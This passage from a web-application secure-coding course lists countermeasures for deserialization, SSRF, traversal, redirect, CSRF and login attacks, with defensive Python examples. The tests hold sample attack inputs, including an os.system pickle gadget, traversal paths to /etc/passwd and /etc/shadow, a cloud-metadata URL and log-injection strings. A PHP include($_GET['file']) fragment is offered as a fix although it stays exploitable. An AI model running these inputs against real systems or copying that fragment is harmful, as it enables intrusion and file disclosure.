o Secure passwords with a cryptographic password hashing algorithm such as bcrypt,
scrypt, or Argon2.
o Check new passwords against a list of the most common bad passwords.
o Log authentication failures and send alerts whenever probable attacks are detected.
o Never expose session IDs in shared URLs, so that URL rewriting attacks have nothing
to capture.
o Use proper session management procedures for login and logout actions and ensure
that the session value is invalidated after logging out.
o Harden API gateways, credential recovery, and registration against enumeration
attacks.

o The login failure response should not reveal which part of the credential is incorrect;
respond only with a generic "invalid username and/or password" message.
o Implement identity and access management (IAM) and enforce secure password
policies to strengthen user account passwords.
■ Software and Data Integrity Failures

o Use digital signatures or similar mechanisms to verify that software and data come
from the expected source and have not been modified.
o Obtain libraries and dependencies only from trusted repositories such as npm and
Maven.
o Check software components for known vulnerabilities using supply-chain security
tools such as OWASP Dependency-Check or OWASP CycloneDX.
o Regularly audit the software code and configuration to reduce the likelihood of
malicious code entering the software pipeline.
o Implement appropriate isolation, configuration, and access control for the data
flowing through the build and deploy stages of the CI/CD pipeline.
■ Insecure Deserialization

o Validate untrusted input before it is serialized, so that serialized data contains only
trusted classes.
o Treat any serialized data that has crossed a trust boundary as untrusted, wherever it
originated.
o Re-architect the application where necessary so that it does not need to deserialize
data from untrusted sources.
o Avoid serialization of security-sensitive classes.
o Guard sensitive data during deserialization.
o Filter untrusted serialized data.
o Duplicate the security manager checks enforced in a class during both serialization
and deserialization.
o Understand the security permissions granted to serialization and deserialization
code.
o Implement integrity checks or encryption of serialized objects to prevent data
modification or hostile object creation.
o Isolate the code that deserializes so that it runs in a very-low-privileged environment.
o Log deserialization exceptions and failures, such as when the incoming type is not
the expected type or the deserialization itself throws an exception.
o Check and limit network activity to and from containers and servers that perform
deserialization.
o Monitor deserialization to detect a user who deserializes constantly.
o Avoid deserialization of domain objects.

o Always perform integrity checks before starting deserialization.
o Prefer language-agnostic data formats such as JSON or XML over native object
serialization features.
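As an added example (not the course's code) of the last three points, the Python block below shows both halves: a pickle Unpickler whose find_class allow-list refuses a gadget that names os.system, and a JSON envelope whose HMAC is checked in constant time before anything is parsed. The key, the allow-list, and the payloads are constructed for the demonstration.

```python
import hashlib
import hmac
import io
import json
import os
import pickle

# --- Part 1: if native serialization must be read, allow-list the classes it may name.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"),
                ("collections", "OrderedDict")}   # constructed allow-list for this example


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # pickle calls this for every global the stream wants to resolve;
        # anything not explicitly allowed (os.system, subprocess.*, ...) is refused.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class _Gadget:
    """Shaped like an attacker's payload: on load, call os.system with a command.
    Serializing it only records the reference; nothing runs until unpickling."""
    def __reduce__(self):
        return (os.system, ("echo pwned",))


# --- Part 2 (preferred): a language-agnostic format with an integrity check first.
def pack(obj, key: bytes) -> bytes:
    body = json.dumps(obj, separators=(",", ":"), sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"." + tag


def unpack(blob: bytes, key: bytes):
    body, _, tag = blob.rpartition(b".")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):   # constant-time, before any parsing
        raise ValueError("integrity check failed")
    return json.loads(body)


def demo() -> dict:
    """Exercise both parts and report what happened."""
    results = {}
    benign = pickle.dumps({"user": "alice", "roles": ["viewer"]})
    results["benign"] = restricted_loads(benign)
    try:
        restricted_loads(pickle.dumps(_Gadget()))
        results["gadget_blocked"] = False
    except pickle.UnpicklingError:
        results["gadget_blocked"] = True

    key = b"constructed-demo-key"       # in production: a per-deployment secret
    blob = pack({"user": "alice", "roles": ["viewer"]}, key)
    results["roundtrip"] = unpack(blob, key)
    tampered = blob.replace(b'"viewer"', b'"admin"')
    try:
        unpack(tampered, key)
        results["tamper_detected"] = False
    except ValueError:
        results["tamper_detected"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The allow-list in Part 1 only narrows the attack surface; it is the fallback for legacy streams. Part 2 is the design the bullets recommend: the receiver never instantiates arbitrary types, and a forged or modified blob is rejected by the MAC check before the JSON parser ever sees it.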
• Security Logging and Monitoring Failures/Insufficient Logging and Monitoring

o Define the scope of assets covered by log monitoring so that it includes
business-critical areas.
o Set up a minimum baseline for logging and ensure that it is followed for all assets.
o Record logs with user context so that events are traceable to specific users.
o Determine what to log, and what to look for in the logs, through proactive incident
identification.
o Sanitize all event data to prevent log injection attacks.
o Implement a common logging mechanism for the whole application and an
effective incident response process.
o Ensure that all logins, access control failures, and input validation failures are logged
with enough user context to identify suspicious accounts.
o Give high-value transactions an audit trail with integrity controls that prevent
tampering, such as append-only database tables.
o Maintain secured backup servers for log files as part of the backup and recovery
plan.
o Employ unified log monitoring and management platforms such as NLog and OWASP
AppSensor, with features such as continuous visual monitoring and alerting.
o Synchronize time across the network (for example, with NTP) so that event logs can
be correlated in real-time analysis.
o Analyze suspicious activities such as unexpected device shutdowns, restarts, and
logins.
o Include partial or nearly failed calls, such as 403 Forbidden responses or any user
input validation errors, in the log monitoring checklist.
o Employ the latest technologies, such as AI-powered log monitoring, anomaly
detection, and IDS/IPS, to improve the monitoring and management of log events.
o Produce all log files in a standard format to facilitate ingestion by any log
management system.
o Protect log files in transit with encryption so that they cannot be altered by
injection or man-in-the-middle attacks.
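The added Python example below (not from the course) shows what "logged with user context", "sanitized against log injection", and "alert on probable attacks" look like in practice: each authentication failure becomes one JSON line with a UTC timestamp, attacker-supplied fields have CR/LF and other control characters neutralized, and a small detector raises an alert when a single source IP accumulates failures inside a sliding window. The events, addresses, and threshold are constructed.

```python
import json
import re
from datetime import datetime, timedelta, timezone

_CONTROL = re.compile(r"[\x00-\x1f\x7f]")     # CR, LF, ESC, NUL, ...


def sanitize(value: str, limit: int = 200) -> str:
    """Escape CR/LF and other control characters so that an attacker-supplied
    field cannot forge a second log line or inject a terminal escape sequence."""
    escaped = _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)
    return escaped[:limit]


def auth_failure_event(username: str, src_ip: str, reason: str, when: datetime) -> str:
    """One structured line per failure, always with user context and a UTC timestamp."""
    return json.dumps({
        "ts": when.astimezone(timezone.utc).isoformat(timespec="seconds"),
        "event": "auth.failure",
        "user": sanitize(username),
        "src_ip": sanitize(src_ip),
        "reason": reason,          # fixed vocabulary chosen by the code, never user text
    }, sort_keys=True)


def spray_alerts(lines, threshold: int = 5, window: timedelta = timedelta(minutes=5)):
    """Return [(src_ip, count)] for every source that produced >= threshold
    auth.failure events inside any sliding window of the given length."""
    by_ip = {}
    for line in lines:
        event = json.loads(line)
        if event.get("event") != "auth.failure":
            continue
        by_ip.setdefault(event["src_ip"], []).append(datetime.fromisoformat(event["ts"]))
    alerts = []
    for ip, times in by_ip.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append((ip, best))
    return alerts


def demo():
    """Constructed events: six failures for six different users from one IP within
    75 seconds (a password spray) and one failure carrying a log-injection attempt."""
    t0 = datetime(2024, 5, 1, 10, 0, tzinfo=timezone.utc)
    lines = [auth_failure_event(f"user{i}", "203.0.113.9", "bad_password",
                                t0 + timedelta(seconds=15 * i)) for i in range(6)]
    lines.append(auth_failure_event('bob\r\n{"event":"auth.success","user":"admin"}',
                                    "198.51.100.4", "bad_password",
                                    t0 + timedelta(minutes=1)))
    return lines, spray_alerts(lines)


if __name__ == "__main__":
    lines, alerts = demo()
    print("\n".join(lines))
    print(alerts)   # [('203.0.113.9', 6)]
```

Grouping by source IP rather than by username is what catches a spray: every individual account sees only one failure, so a per-account lockout counter never fires, but the one source behind all of them crosses the threshold.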

■ Server-Side Request Forgery Attacks

o Validate and sanitize all client-supplied data before using it to build a server-side
request.
o Allow only the URL schemes the application actually uses (e.g., https://) and block
all others, such as file://, ftp://, and gopher://.
o Never return the raw response from the fetched resource to the client.
o Do not follow HTTP redirects when fetching remote resources.
o Resolve the target host once and connect to the validated address, to prevent DNS
rebinding and time-of-check to time-of-use (TOCTOU) attacks.
o Segregate the functionality that accesses remote resources into distinct networks.
o Enable a "deny by default" policy, or implement access-control rules that block all
intranet traffic except the essential traffic.
o Use VPNs and other encryption techniques on the frontend systems to enhance
security.
o Whitelist the domains or addresses the application is allowed to access.
o Allow access only to authorized file extensions by hard-coding the allowed
extension, so that a supplied value cannot select an arbitrary file type. The
following PHP fragment appends the extension itself instead of trusting the request:
<?php
// The request supplies only the file stem; the ".html" extension is fixed in code.
include($_GET['file'] . '.html');
?>
Hard-coding the extension does not by itself stop path traversal ("../") in the
supplied stem, so combine it with the whitelisting described above.
o Configure the systems to log changes within the server and track the dates of file
changes.
o Deploy a next-generation web application firewall (NGWAF) to enhance protection
against SSRF attacks.
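The validator below is an added Python example (not code from the course) that applies the scheme allow-list, host allow-list, and "resolve once, then connect to the validated address" rules from the list above. The resolver is injectable so the check runs offline here; the hostnames and DNS answers are constructed for the demonstration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"api.partner.example", "cdn.example"}   # constructed allow-list


def resolve_all(host: str):
    """Real resolver: every address the name currently maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # RFC 1918, loopback, link-local (169.254.169.254 metadata), multicast, reserved, 0.0.0.0
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_target(url: str, resolve=resolve_all):
    """Return (pinned_ip, host, path) for an acceptable URL, else raise ValueError.

    The caller must open the connection to pinned_ip (sending `host` in the
    Host header / TLS SNI) instead of resolving the name again; that closes the
    DNS-rebinding / TOCTOU window between this check and the actual request."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL not allowed")    # https://trusted@evil trick
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host not allowed: {host!r}")
    if parts.port not in (None, 443):
        raise ValueError(f"port not allowed: {parts.port}")
    addresses = resolve(host)
    if not addresses:
        raise ValueError(f"host did not resolve: {host!r}")
    internal = [ip for ip in addresses if not is_public(ip)]
    if internal:   # one internal answer (rebinding, split-horizon DNS) fails the whole host
        raise ValueError(f"host resolves to internal address {internal[0]}")
    return addresses[0], host, parts.path or "/"


# Constructed DNS answers so the example runs offline: cdn.example has been
# (re)bound to an RFC 1918 address, which is exactly the case the check must catch.
FAKE_DNS = {"api.partner.example": ["93.184.216.34"], "cdn.example": ["10.0.0.5"]}


def check(url: str) -> str:
    try:
        ip, host, path = validate_target(url, resolve=lambda h: FAKE_DNS.get(h, []))
        return f"allow {ip}{path}"
    except ValueError as exc:
        return f"deny: {exc}"


if __name__ == "__main__":
    for u in ("https://api.partner.example/v1/orders", "http://api.partner.example/",
              "https://cdn.example/app.js", "https://169.254.169.254/latest/meta-data/",
              "https://api.partner.example@evil.example/", "file:///etc/passwd"):
        print(u, "->", check(u))
```

Note that the allow-listed host is not trusted by name alone: its current resolution is checked too, and the address returned is the one the HTTP client must use. Redirects must likewise be disabled on that client, or each redirect target has to go through validate_target again.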
■ Directory Traversal

Directory traversal enables attackers to abuse HTTP to access restricted directories and
run commands outside the web server's root directory. Developers must configure web
applications and their servers with appropriate file and directory permissions to avoid
directory traversal vulnerabilities.
Some countermeasures against directory traversal attacks are as follows:
o Define access rights to the protected areas of the website.
o Apply checks/hotfixes that prevent exploitation of encoding bypasses, such as
Unicode and double URL encoding, which defeat naive directory traversal filters.
o Web servers should be updated with security patches in a timely manner.

o Validate user input before processing by comparing it against a whitelist, and
verify that the input contains only alphanumeric characters.
o Append the input to the base directory, canonicalize the resulting path with the
platform filesystem API, and verify that the canonical path is still inside the base
directory.
o Use an advanced content management system (CMS) for handling large numbers of
documents.
o Host documents on a separate file server or cloud storage to prevent mixing of
public and sensitive documents.
o Properly sanitize file names coming from HTTP requests.
o Restrict file names to a list of known-good characters and ensure that any references
to files use only these characters.
o Do not rely on user input to call file-system APIs.
o Serve content through application logic rather than mapping URI requests directly
to file-system paths.
o Use a chroot jail on Unix-based systems.
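The following added Python example (not from the course) implements the decode, allow-list, hard-coded extension, canonicalize, and containment steps from the list above in one function; the base directory, extensions, and requests are constructed.

```python
import os
import re
from urllib.parse import unquote

BASE_DIR = "/srv/app/docs"                   # constructed document root
ALLOWED_EXT = {".html", ".pdf", ".txt"}      # hard-coded, as the page advises
_STEM = re.compile(r"^[A-Za-z0-9_-]+$")      # known-good characters for the file stem


def safe_document_path(requested: str, base_dir: str = BASE_DIR) -> str:
    """Return the canonical path of `requested` inside base_dir, or raise ValueError.

    Layer 1: decode once and refuse anything still encoded (blocks %252e%252e).
    Layer 2: allow-list the file name (characters and extension).
    Layer 3: canonicalize with the platform API and check containment."""
    name = unquote(requested)
    if "%" in name:
        raise ValueError(f"encoded characters remain after one decode: {requested!r}")
    stem, ext = os.path.splitext(os.path.basename(name))
    if ext.lower() not in ALLOWED_EXT or not _STEM.fullmatch(stem):
        raise ValueError(f"rejected by allow-list: {requested!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))   # resolves ".." and symlinks
    # Containment must be a path comparison, not a string prefix: "/srv/app/docs2"
    # would pass a startswith() check against "/srv/app/docs".
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"escapes base directory: {requested!r}")
    return target


def is_blocked(requested: str) -> bool:
    """True when safe_document_path refuses the request."""
    try:
        safe_document_path(requested)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(safe_document_path("reports/q1.pdf"))          # /srv/app/docs/reports/q1.pdf
    for attempt in ("../../etc/passwd", "../../../etc/shadow.txt",
                    "%2e%2e/%2e%2e/%2e%2e/etc/shadow.txt", "%252e%252e/x.txt",
                    "/etc/passwd.txt", "shell.php", "a;b.txt"):
        print(attempt, "->", "blocked" if is_blocked(attempt) else "ALLOWED")
```

Each layer catches inputs the others would miss: the allow-list stops "shell.php" and "a;b.txt", the single-decode rule stops double-encoded dots, and canonicalization plus commonpath stops "../../../etc/shadow.txt", whose basename passes the allow-list on its own.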
■ Unvalidated Redirects and Forwards

In general, web applications redirect and forward users to other pages and websites. If a
web application does not validate the destination, attackers can redirect users to
malicious websites or use forwards to reach unauthorized pages. To prevent such attacks,
it is best not to let users directly supply the parameters that drive redirects and forwards
in the application logic.
Some countermeasures against unvalidated redirect and forward attacks are as follows:
o Avoid using redirects and forwards.
o If destination parameters cannot be avoided, ensure that the supplied value is valid
and authorized for the user.
o Avoid accepting a URL as user input for the destination; if one is accepted, validate it.
o Sanitize the input against a list of trusted URLs, expressed as a list of hosts or as a
regular expression.
o Where a fixed destination is needed, use a meta refresh with a hard-coded HTML
target rather than a user-controlled one.
o Implement token ID verification for redirecting web pages.
o Prefer relative URLs over absolute ones during redirection, so that the destination
cannot leave the site.
o Educate users to identify malicious sites and the common URL-stuffing tricks
attackers use.
o Show a notification page while redirecting users to a new web page.

o Keep redirect scripts out of search engine indexes so that users are not tricked into
clicking unsafe links through search results.
o Apply internal redirects with minimal filtering to limit redirects to a local subdomain.
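An added Python example (not the course's code) of validating a redirect parameter against the rules above: only site-relative paths or https URLs to an allow-listed host survive, and the destination is rebuilt so that userinfo, unusual ports, and fragments are dropped. The host list is constructed.

```python
from urllib.parse import urlsplit, urlunsplit

SITE_HOSTS = {"www.example.com", "account.example.com"}   # constructed


def safe_redirect_target(value: str, default: str = "/") -> str:
    """Return a destination the application may redirect to, or `default`.

    Accepted: a site-relative path ("/account?tab=1") or an https URL whose host
    is one of ours. Everything else, including protocol-relative "//evil",
    backslash variants, other schemes and userinfo tricks, falls back to default."""
    if not value or len(value) > 2048:
        return default
    candidate = value.replace("\\", "/")   # browsers treat "\" as "/"; urlsplit does not
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        try:
            port = parts.port
        except ValueError:                 # "https://host:abc/"
            return default
        host = (parts.hostname or "").lower()
        if parts.scheme != "https" or host not in SITE_HOSTS or port not in (None, 443):
            return default
        # Rebuild instead of echoing: drops userinfo, the explicit port and the fragment.
        return urlunsplit(("https", host, parts.path or "/", parts.query, ""))
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    for value in ("/account?tab=1", "https://www.example.com:443/p#frag",
                  "//evil.example/", "\\\\evil.example", "javascript:alert(1)",
                  "https://www.example.com@evil.example/", "http://www.example.com/"):
        print(repr(value), "->", safe_redirect_target(value))
```

The function never returns what it was given: a relative target is re-serialized from its parsed path and query, and an absolute one from the validated host, so whatever parsing ambiguity the browser applies to the raw string cannot be exploited.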
■ Watering Hole Attack

o Regularly apply software patches to remove any vulnerabilities.
o Monitor network traffic.
o Secure the DNS server to prevent attackers from redirecting the site to a new
location.
o Analyze user behavior.
o Inspect popular websites.
o Use browser plug-ins that block HTTP redirects.
o Disable third-party content such as advertising services, which track user activities.
o Make sure to hide online activities with a VPN and enable the browser's private
browsing feature.
o Make sure to run the web browser in a virtual environment to limit access to the
local system.
o Use web filters to detect attacks on websites and prevent browsers from accessing
infected pages.
o Restrict users from granting additional permissions to websites.
o Employ an email solution that can apply similar dynamic malware analysis to protect
against targeted email traps.
o Utilize micro-virtualization, which is difficult to bypass.
■ Cross-Site Request Forgery

In a CSRF attack, the attacker lures a user's browser into sending a forged HTTP request,
carrying the user's session cookie and other authentication information, to a legitimate
(vulnerable) web application so that it performs an action the user did not intend.
Some countermeasures against cross-site request forgery attacks are as follows:
o Log off immediately after using a web application and clear the browser history.
o Do not allow the browser or the website to save login details.
o Check the HTTP Origin and Referer headers, and when processing a POST, ignore URL
parameters.
o Require a custom request header such as X-Requested-With (which jQuery adds to
its AJAX calls) on state-changing requests; a cross-origin page cannot add custom
headers without passing a CORS preflight. Mark the session cookie HttpOnly so that
scripts cannot read it.

o Use CSRF tokens, such as a nonce submitted through a hidden form field, to block
forged requests.
o Employ frameworks such as Joomla, Spring, Struts, Ruby on Rails, and .NET, which
have built-in CSRF protection.
o Prefer a per-request token assignment strategy over per-session token assignment.
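The added Python example below (not from the course) combines a session-bound, time-limited synchronizer token with an Origin/Referer check, and shows the handler rejecting a request that carries the victim's cookie but a foreign Origin, or a token minted for another session. The secret key, session IDs, and headers are constructed.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlsplit

SECRET = secrets.token_bytes(32)   # constructed per-process key; a deployment keeps one in its secret store
TOKEN_TTL = 3600                   # seconds


def issue_csrf_token(session_id: str, secret: bytes = SECRET, now: float = None) -> str:
    """token = nonce.timestamp.HMAC(secret, session_id|nonce|timestamp)

    Binding to the session id makes a token lifted from another session useless;
    the fresh nonce lets the application hand out a new token per request."""
    ts = str(int(time.time() if now is None else now))
    nonce = secrets.token_urlsafe(16)
    mac = hmac.new(secret, f"{session_id}|{nonce}|{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{ts}.{mac}"


def verify_csrf_token(token: str, session_id: str, secret: bytes = SECRET, now: float = None) -> bool:
    try:
        nonce, ts, mac = token.split(".")
        issued = int(ts)
    except ValueError:
        return False
    expected = hmac.new(secret, f"{session_id}|{nonce}|{ts}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return False
    current = time.time() if now is None else now
    return 0 <= current - issued <= TOKEN_TTL


def origin_allowed(headers: dict, site_host: str) -> bool:
    """Second, independent check: the request must come from our own origin.
    Origin is preferred; Referer is the fallback. A POST with neither is refused."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return (urlsplit(source).hostname or "").lower() == site_host


def handle_transfer(form: dict, headers: dict, session_id: str, now: float = None) -> str:
    """Constructed state-changing endpoint: the session cookie alone is never enough."""
    if not origin_allowed(headers, "bank.example"):
        return "403 cross-site origin"
    if not verify_csrf_token(form.get("csrf_token", ""), session_id, now=now):
        return "403 missing or invalid csrf token"
    return f"200 transferred {form.get('amount')} to {form.get('to')}"


if __name__ == "__main__":
    token = issue_csrf_token("s-victim")
    print(handle_transfer({"csrf_token": token, "amount": "10", "to": "acct-1"},
                          {"Origin": "https://bank.example"}, "s-victim"))
    print(handle_transfer({"amount": "10", "to": "acct-1"},
                          {"Origin": "https://attacker.example"}, "s-victim"))
```

The server keeps no token table: validity is proven by the MAC over the session ID, so tokens can be issued per request at no storage cost, which is the per-request strategy the last bullet recommends.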
■ Cookie/Session Poisoning
Browsers use cookies to maintain a session state. They also contain sensitive, session-
specific data (e.g., user IDs, passwords, account numbers, links to shopping cart
contents, supplied private information, and session IDs). Attackers engage in
cookie/session poisoning by modifying the data in the cookie to gain escalated access or
maliciously affect a user session. Developers must hence follow secure coding practices
to secure web applications against such poisoning attacks. They must use proper
session-token generation mechanisms to issue random session IDs.
Some countermeasures against cookie/session poisoning attacks are as follows:
o Do not store plaintext or weakly encrypted passwords in cookies.
o Implement cookie timeouts.
o Associate the authentication credentials carried in a cookie with the client IP
address.
o Make logout functions available.
o Validate all cookie values to ensure that they are well-formed and correct.
o Use virus and malware scanning software to protect the browser from malicious
scripts that hijack cookies.
o Clear stored cookies from the browser regularly.
o Employ cookie randomization, changing the website or service cookie whenever the
user makes a request.
o Use a VPN with high-grade encryption and traffic routing to prevent session
sniffing.
o Restrict multipurpose cookies so that a single task is assigned to each individual
cookie.
o Use HTTPS to secure the flow of information.
o Enable synchronous session management to enhance cookie security.
o Never derive session identifiers from predictable generators (timestamps, counters,
weak PRNGs); use a cryptographically secure random generator.
■ Web Service Attack
Use multiple layer protection and standard HTTP authentication techniques to defend
against web service attacks. Because most models incorporate business-to-business
applications, it becomes easier to restrict access to only valid users.

Some additional countermeasures against web service attacks are as follows:
o Configure WSDL access control permissions to grant or deny access to any type of
WSDL-based SOAP message.
o Use document-centric authentication credentials based on SAML.
o Use multiple security credentials such as X.509 certificates, SAML assertions, and
WS-Security.
o Deploy web-service-capable firewalls that can perform SOAP- and ISAPI-level
filtering.
o Configure firewalls/IDS systems for anomaly and signature detection for web
services.
o Configure firewalls/IDS systems to filter improper SOAP and XML syntax.
o Implement centralized in-line request and response schema validation.
o Block external references and use pre-fetched content when dereferencing URLs.
o Maintain and update a secure repository of XML schemas.
o Use password digests, Kerberos tickets, or X.509 certificates in SOAP headers for
authentication.
o Sign messages with a digital signature at the sender's end and verify the signature
at the recipient's end to maintain message integrity.
o Use URL authorization to restrict access to the web service file (.asmx).
o Authorize access to WSDL files using NTFS permissions.
o Disable the documentation protocols to prevent dynamic generation of WSDL.
o Verify the caller's endpoint in the SOAP message before deciding whether the BPEL
engine processes it.
o Do not act on SOAPAction values such as createUser or deleteUser taken from the
HTTP request without authorization.
o Avoid easily guessable SOAPAction names.
o Disable the SOAPAction attribute when not in use.
o Compare the operation named in the SOAPAction header with the one in the SOAP
body.
o Disable WS-Addressing completely. If WS-Addressing is strictly required, create a
whitelist of allowed addresses.
o Use an XML proxy to hide internal configuration information that web services
could otherwise reveal.
o Implement XSLT to perform XML address translation on outgoing XML messages.
o Use TLS to secure SOAP communication and use the same encoding on the client
and server.

o Ensure that web services are compliant with Web Services Interoperability (WS-I)
profiles.
• Clickjacking Attack
o Use a server-side defense such as the X-Frame-Options header with the DENY or
SAMEORIGIN option to stop the site from being framed by another origin. The
ALLOW-FROM URI option is obsolete and ignored by current browsers; use the CSP
frame-ancestors directive for that case.
o Never rely on client-side methods such as framebusting or framebreaking scripts
alone, as they can be bypassed easily.
o Mask the HTML document and reveal it only after verifying that the page is not
framed.
o Use the Content-Security-Policy (CSP) HTTP header with the frame-ancestors
directive, as it provides considerable flexibility for defining allowed sources in
complex deployments.
o Use the SameSite cookie attribute to prevent session cookies from being sent when
the page is loaded in a cross-site frame.
o Frequently run a web vulnerability scanner to detect and remove clickjacking
vulnerabilities.
o Identity providers such as Auth0 protect their universal login page from clickjacking
by sending both X-Frame-Options and CSP headers; do the same for your own login
pages.
o Employ a UI defensive script that confirms the current frame is the top-level
window.
o Use window.confirm() protection, which tells users which action they are about to
perform.
• JavaScript Hijacking
o Use .innerText rather than .innerHTML in JavaScript so that text is encoded
automatically.
o Avoid using the eval function because of its vulnerable nature.
o Do not write your own serialization code.
o Use an encoding library to safeguard attributes and data elements, and avoid
building XML dynamically.
o Use SSL/TLS for secure communication and perform encryption on the server rather
than in client-side code.
o Build XML using an appropriate framework; avoid building XML manually.
o Return JSON wrapped in an outer object rather than a bare array, e.g., {"result":
[{"object": "inside array"}]}.
o Maintain proper, unique URLs for each session that retrieves JSON objects.
o Ensure that no confidential data from the server is transmitted to the client side in
JSON objects.

o Employ AI-based JavaScript monitoring of all ongoing sessions to detect unwanted
actions and malicious patterns.
o Maintain a proper tree-based lifecycle of JavaScript libraries so that deep analysis
can check for any modifications.
o Enable Subresource Integrity (SRI) to detect any modification of JavaScript code
loaded from external hosts.
o Use JavaScript analyzers to check the code of client-side applications for
vulnerabilities or errors.
• Username Enumeration
o Ensure that inputs that include user identifiers produce outputs containing only
generic error messages.
o Use randomly generated data for usernames instead of sequential numbers.
o Employ proper defenses against SQL injection and XSS attacks to prevent user
enumeration through dumped data.
o Apply CAPTCHA to all input-accepting pages to prevent automated data collection.
o Use a WAF to detect and block individual IP addresses that make many requests.
o Apply two-factor authentication (2FA), or pad the response time so that known and
unknown usernames take the same time to answer, to prevent username
enumeration.
o Use random, complex usernames when creating the Active Directory username list.
o Always use only complex, difficult-to-guess passwords and change the default
usernames and passwords.
o Harden all services to disallow null binds and prevent remote root authentication.
o Avoid informing users that a given username has already been registered on the
website.
o Ensure that usernames on the "Forgot Password" web page are hidden.
o Implement rate limiting to prevent username enumeration attacks, e.g., blocking
requests from an IP address after three failed login attempts.
o Employ geo limiting: record the user's location during registration and validate
login attempts against it.
o Return the same response for all failed login attempts to prevent username
enumeration, e.g., "The username or password is not valid."
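As an added example (not the course's code), the Python login routine below returns the same message for an unknown user and a wrong password, and performs the same password-hash computation in both cases so that response time does not leak whether the username exists; it also locks an account after repeated failures without changing the message. The user store is constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 50_000
GENERIC_FAILURE = "The username or password is not valid."
LOCK_AFTER = 5


def hash_password(password: str, salt: bytes = None) -> tuple:
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: username -> (salt, digest). A real one lives in a database.
USERS = {"alice": hash_password("correct horse battery staple")}
FAILED = {}   # username -> consecutive failures, keyed by the *submitted* name, existing or not

# Verified whenever the username is unknown, so a miss costs the same KDF work as a
# wrong password; the attacker cannot time-separate "no such user" from "bad password".
_DUMMY_SALT, _DUMMY_DIGEST = hash_password(os.urandom(16).hex())


def login(username: str, password: str) -> tuple:
    """Return (ok, message). The message never reveals which check failed."""
    salt, digest = USERS.get(username, (_DUMMY_SALT, _DUMMY_DIGEST))
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    matched = hmac.compare_digest(candidate, digest) and username in USERS
    locked = FAILED.get(username, 0) >= LOCK_AFTER       # checked after the work, not before
    if matched and not locked:
        FAILED.pop(username, None)
        return True, "Welcome"
    FAILED[username] = FAILED.get(username, 0) + 1
    return False, GENERIC_FAILURE


if __name__ == "__main__":
    print(login("alice", "correct horse battery staple"))   # (True, 'Welcome')
    print(login("alice", "wrong"))                          # (False, 'The username or password is not valid.')
    print(login("nobody", "wrong"))                         # same message as above
```

The order inside login() matters: the KDF runs before the lockout check and before the existence check, so the only thing an observer learns from a failure, whatever its cause, is the one generic string and a roughly constant delay. The per-name failure counter is kept for nonexistent names too, so that "does this name lock out?" cannot be used as an oracle either.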

■ Attack on Password Reset Mechanism

o Properly validate the random token and email link combination before executing
the request.
o Ensure that all password reset URLs can be used only once and carry an expiry time
limit.
o Prevent automated requests from programs by enforcing human checks such as
CAPTCHA.
o Restrict the number of requests generated from any IP or device within a stipulated
time.
o Use advanced multi-factor authentication (MFA) techniques to prevent account
hijacking through password reset tokens.
o Ensure that password reset URLs use HTTPS.
o Send a temporary password to the registered email address instead of directly
resetting the password.
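Added Python example (not from the course) of a reset token that is single-use, time-limited, bound to the user it was issued for, and stored only as a hash so that a database leak does not expose live tokens. The store and timestamps are constructed.

```python
import hashlib
import hmac
import secrets
import time

RESET_TTL = 15 * 60            # seconds a link stays valid
_pending = {}                  # sha256(token) -> (username, expires_at); constructed in-memory store


def create_reset_token(username: str, now: float = None) -> str:
    """Issue a fresh token; any earlier token for the same user is invalidated."""
    current = time.time() if now is None else now
    for key in [k for k, (owner, _) in _pending.items() if owner == username]:
        del _pending[key]
    token = secrets.token_urlsafe(32)                       # 256 bits from the OS CSPRNG
    key = hashlib.sha256(token.encode()).hexdigest()        # only the hash is stored
    _pending[key] = (username, current + RESET_TTL)
    return token      # goes into the emailed https:// link; the database never sees it


def consume_reset_token(token: str, username: str, now: float = None) -> bool:
    """True exactly once: the token must exist, be unexpired and belong to `username`.
    Presenting it, validly or not, removes it, so a replay finds nothing."""
    current = time.time() if now is None else now
    key = hashlib.sha256(token.encode()).hexdigest()
    entry = _pending.pop(key, None)
    if entry is None:
        return False
    owner, expires_at = entry
    return hmac.compare_digest(owner.encode(), username.encode()) and current <= expires_at


if __name__ == "__main__":
    t = create_reset_token("alice")
    print(consume_reset_token(t, "alice"))   # True
    print(consume_reset_token(t, "alice"))   # False: already used
```

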